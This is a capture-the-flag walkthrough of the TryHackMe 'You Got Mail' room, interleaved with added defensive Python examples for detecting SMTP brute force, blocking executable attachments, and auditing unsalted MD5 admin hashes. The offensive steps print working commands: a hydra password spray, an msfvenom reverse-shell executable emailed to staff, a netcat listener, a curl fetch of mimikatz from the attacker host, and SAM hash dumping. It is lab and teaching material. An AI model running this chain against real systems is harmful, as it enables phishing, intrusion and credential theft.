TryHackMe - You Got Mail
A Windows machine is fun as well
Introduction
Let’s step up our game and try a Medium room. We are supposed to get into the brownbrick.co website and gain access via an e-mail address, I’m assuming.
Nmap
Let’s start with an nmap scan:
nmap -T4 -n -sC -sV -Pn -p- 10.10.148.225
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: USER UIDL TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: OK IMAP4rev1 IMAP4 completed CHILDREN SORT RIGHTS=texkA0001 ACL CAPABILITY IDLE QUOTA NAMESPACE
445/tcp open microsoft-ds?
587/tcp open smtp hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-02-18T19:57:00+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=BRICK-MAIL
| Not valid before: 2025-02-17T19:53:26
|_Not valid after: 2025-08-19T19:53:26
| rdp-ntlm-info:
| Target_Name: BRICK-MAIL
| NetBIOS_Domain_Name: BRICK-MAIL
| NetBIOS_Computer_Name: BRICK-MAIL
| DNS_Domain_Name: BRICK-MAIL
| DNS_Computer_Name: BRICK-MAIL
| Product_Version: 10.0.17763
|_ System_Time: 2025-02-18T19:56:52+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BRICK-MAIL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-02-18T19:56:52
|_ start_date: N/A
A lot of open ports, mostly Microsoft services, alongside hMailServer’s SMTP, POP3 and IMAP listeners.
Reconnaissance
Along with the open ports, we were given a website, https://brownbrick.co, so let’s have a visit.
We can go straight to the team page, where the e-mail addresses are listed. Let’s save them to a list (team.txt) so we can brute-force with it later:
oaurelius@brownbrick.co
tchikondi@brownbrick.co
wrohit@brownbrick.co
pcathrine@brownbrick.co
lhedvig@brownbrick.co
fstamatis@brownbrick.co
And we can build a password list from the website’s own content using the cewl tool:
$ cewl --lowercase https://brownbrick.co/ > pass.txt
Brute Force
Ok, since we have our username and password lists, let’s try to brute-force SMTP authentication on port 587/tcp, since it was open.
We will use hydra since it’s the easiest option:
hydra -L team.txt -P pass.txt 10.10.148.225 smtp -s 587
And we’ve got a hit!
[587][smtp] host: 10.10.148.225 login: lhedvig@brownbrick.co password: bricks
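A run like this leaves an obvious trace on the server: one client IP failing AUTH against every mailbox within a few seconds, then succeeding. The following is an added example, not part of the original writeup, showing the detection logic a mail operator could run over authentication logs. The log lines are constructed in a simplified format of my own, not hMailServer’s real log layout, and mirror the hydra run above plus one ordinary user who mistyped a password once.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed, simplified authentication log (NOT hMailServer's real log layout):
#   "<date> <time> <client-ip> AUTH <OK|FAIL> <username>"
# The first burst mirrors the hydra run above; the last two lines are a normal user
# who mistyped their password once.
SAMPLE_LOG = """\
2025-02-18 21:10:01 10.11.75.122 AUTH FAIL oaurelius@brownbrick.co
2025-02-18 21:10:01 10.11.75.122 AUTH FAIL tchikondi@brownbrick.co
2025-02-18 21:10:01 10.11.75.122 AUTH FAIL wrohit@brownbrick.co
2025-02-18 21:10:02 10.11.75.122 AUTH FAIL pcathrine@brownbrick.co
2025-02-18 21:10:02 10.11.75.122 AUTH FAIL lhedvig@brownbrick.co
2025-02-18 21:10:02 10.11.75.122 AUTH FAIL fstamatis@brownbrick.co
2025-02-18 21:10:03 10.11.75.122 AUTH FAIL oaurelius@brownbrick.co
2025-02-18 21:10:04 10.11.75.122 AUTH OK lhedvig@brownbrick.co
2025-02-18 21:15:40 10.10.0.7 AUTH FAIL pcathrine@brownbrick.co
2025-02-18 21:15:52 10.10.0.7 AUTH OK pcathrine@brownbrick.co
"""

def parse_line(line):
    date, time, ip, _auth, result, user = line.split()
    return datetime.fromisoformat(f"{date} {time}"), ip, result, user

def detect_auth_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window count of AUTH failures per client IP.

    Emits BRUTE_FORCE once an IP reaches `threshold` failures inside `window`,
    and SUCCESS_AFTER_BRUTE_FORCE when a flagged IP then logs in successfully,
    which is the signal that a credential was actually guessed.
    """
    recent = defaultdict(deque)      # ip -> timestamps of failures still inside the window
    users_tried = defaultdict(set)   # ip -> distinct usernames attempted (spraying indicator)
    flagged, alerts = set(), []
    for line in lines:
        if not line.strip():
            continue
        ts, ip, result, user = parse_line(line)
        if result == "FAIL":
            q = recent[ip]
            q.append(ts)
            users_tried[ip].add(user)
            while q and ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("BRUTE_FORCE", ip,
                               f"{len(q)} failures in {int(window.total_seconds())}s "
                               f"across {len(users_tried[ip])} usernames"))
        elif result == "OK" and ip in flagged:
            alerts.append(("SUCCESS_AFTER_BRUTE_FORCE", ip,
                           f"login as {user} succeeded after the burst; treat the password as compromised"))
    return alerts

if __name__ == "__main__":
    for kind, ip, detail in detect_auth_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{kind:<26} {ip:<14} {detail}")
```

The second alert is the one that matters operationally: a successful login from an address that was just brute-forcing is the moment to reset that mailbox password and look for mail sent from it, which is exactly what the next step of this writeup abuses.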
Now that we have valid credentials, we can use them to send e-mail to other team members, with a payload built using Metasploit’s msfvenom.
Let’s create a reverse shell executable so we can send it to other team members
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.75.122 LPORT=1337 -f exe -o shell.exe
Let’s listen on port 1337 and send an e-mail with our shell.exe attached.
nc -lvnp 1337
listening on [any] 1337 ...
And let’s send e-mail to the first team member:
sendemail -f "lhedvig@brownbrick.co" -t "oaurelius@brownbrick.co" -u "test" -m "test" -a shell.exe -s 10.10.148.225:25 -xu "lhedvig@brownbrick.co" -xp "bricks"
Feb 18 21:22:08 kali sendemail[23334]: Email was sent successfully!
And we can see that a user has already clicked on our attachment!
connect to [10.11.75.122] from (UNKNOWN) [10.10.148.225] 49759
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Mail\Attachments>
whoami
brick-mail\wrohit
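The whole chain depended on the mail server delivering a raw .exe attachment to an internal mailbox. The following is an added example, not part of the original writeup, of the attachment policy check a mail gateway would apply: it rejects on a blocked extension and, independently, on the PE “MZ” magic in the attachment body, so renaming shell.exe to report.pdf would not get it through. The message builder, the extension list and the two-byte executable stub are all constructed for the example.

```python
import os
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Extensions a mail gateway should not deliver as attachments (short, illustrative list).
BLOCKED_EXTENSIONS = {".exe", ".dll", ".scr", ".com", ".pif", ".bat", ".cmd",
                      ".js", ".vbs", ".ps1", ".hta", ".msi", ".lnk"}

# Constructed stand-in for a Windows executable: only the DOS "MZ" magic is needed here.
PE_STUB = b"MZ" + b"\x90" * 62 + b"PE\x00\x00"

def build_message(filename, data, sender="lhedvig@brownbrick.co", rcpt="oaurelius@brownbrick.co"):
    """Constructed message shaped like the one sendemail produced above."""
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = sender, rcpt, "test"
    msg.set_content("test")
    msg.add_attachment(data, maintype="application", subtype="octet-stream", filename=filename)
    return msg.as_bytes()

def scan_attachments(raw_message):
    """Return [(filename, verdict, reasons)] for every attachment in a raw RFC 5322 message."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_message)
    verdicts = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        reasons = []
        ext = os.path.splitext(name.lower())[1]
        if ext in BLOCKED_EXTENSIONS:
            reasons.append(f"blocked extension {ext}")
        if data[:2] == b"MZ":            # content check catches a renamed executable
            reasons.append("PE executable magic (MZ) regardless of filename")
        verdicts.append((name, "REJECT" if reasons else "ALLOW", reasons))
    return verdicts

if __name__ == "__main__":
    for fname, payload in (("shell.exe", PE_STUB), ("report.pdf", PE_STUB), ("notes.txt", b"hello")):
        print(scan_attachments(build_message(fname, payload)))
```

Note where the shell landed: C:\Mail\Attachments. A directory that mail attachments are written to, and then executed from, is also a natural place to alert on any new process whose image path starts there.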
User Flag
The flag is on our user’s desktop, so let’s grab it.
Getting Passwords
We will use the mimikatz tool for this.
We can dump hashes from the Windows machine, but first we need to get the mimikatz.exe binary onto the target.
Let’s start an HTTP server on our attacker machine in the directory holding mimikatz.exe, so it serves as a download server:
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
And then, on the target, download the file from our machine:
curl http://10.11.75.122/mimikatz.exe -o mimikatz.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1323k 100 1323k 0 0 1323k 0 0:00:01 --:--:-- 0:00:01 3393k
Now we can use mimikatz.exe to dump the hashes:
mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
First we need the debug privilege, acquired with privilege::debug; this only succeeds because our shell already runs with an administrative token:
mimikatz # privilege::debug
Privilege '20' OK
And dump the local SAM hashes:
mimikatz # lsadump::sam
RID : 000003f6 (1014)
User : wrohit
Hash NTLM: 8458995f1d0a4b0c107fb8e23362c814
Now we crack the NTLM hash using crackstation.net.
And to get the hMailServer administrator password, we read its configuration file, where the password is stored as a hash:
C:\Program Files (x86)\hMailServer\Bin>type hMailServer.INI
AdministratorPassword=5f4dcc3b5aa765d61d8327deb882cf99
Crackstation again, and we are done.
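The reason a lookup site finishes the job instantly is that the 32-hex AdministratorPassword value is an unsalted MD5 digest: the same password gives the same digest on every install, so one precomputed table covers them all. The following is an added example, not part of the original writeup, of an audit check an administrator could run against hMailServer.INI, contrasted with what salted, slow hashing would look like. The INI excerpt is constructed (the section name is assumed, and the digest is generated in place so it is correct); the weak-password list is constructed; and PBKDF2 here is my illustration of the alternative, not anything hMailServer offers.

```python
import hashlib
import os
import re

# Constructed hMailServer.INI excerpt. Only the AdministratorPassword key is taken from the
# page; the section name is assumed, and the digest is generated here so it is correct.
def build_sample_ini(admin_password):
    digest = hashlib.md5(admin_password.encode()).hexdigest()
    return f"[Security]\nAdministratorPassword={digest}\n"

# Constructed weak-password list (the kind a cewl run or a leaked-password feed would give).
WEAK_PASSWORDS = ["summer2025", "brownbrick", "welcome1", "letmein", "qwerty123"]

ADMIN_RE = re.compile(r"^AdministratorPassword=([0-9a-fA-F]{32})\s*$", re.MULTILINE)

def audit_admin_password(ini_text, wordlist):
    """Flag an admin password that is stored as unsalted MD5 and matches a known-weak value."""
    m = ADMIN_RE.search(ini_text)
    if not m:
        return {"found": False, "weak_match": None}
    digest = m.group(1).lower()
    # Unsalted MD5 means every install hashes the same password to the same digest,
    # so one precomputed table (or one wordlist pass) checks every server at once.
    weak = next((w for w in wordlist if hashlib.md5(w.encode()).hexdigest() == digest), None)
    return {"found": True, "weak_match": weak}

ITERATIONS = 200_000   # illustrative PBKDF2 work factor

def salted_hash(password, salt=None):
    """The contrast: a per-password random salt plus a slow KDF (PBKDF2-HMAC-SHA256)."""
    salt = os.urandom(16) if salt is None else salt
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, key

def verify_salted(password, salt, key):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS) == key

if __name__ == "__main__":
    print(audit_admin_password(build_sample_ini("summer2025"), WEAK_PASSWORDS))
    s1, k1 = salted_hash("summer2025")
    s2, k2 = salted_hash("summer2025")
    print("same password, different stored values:", k1 != k2)
```

Since the storage format is not something the operator controls, the practical mitigations are a long random administrator password (so no wordlist or table contains it) and tight ACLs on the Bin directory, which in this room was readable by the compromised user.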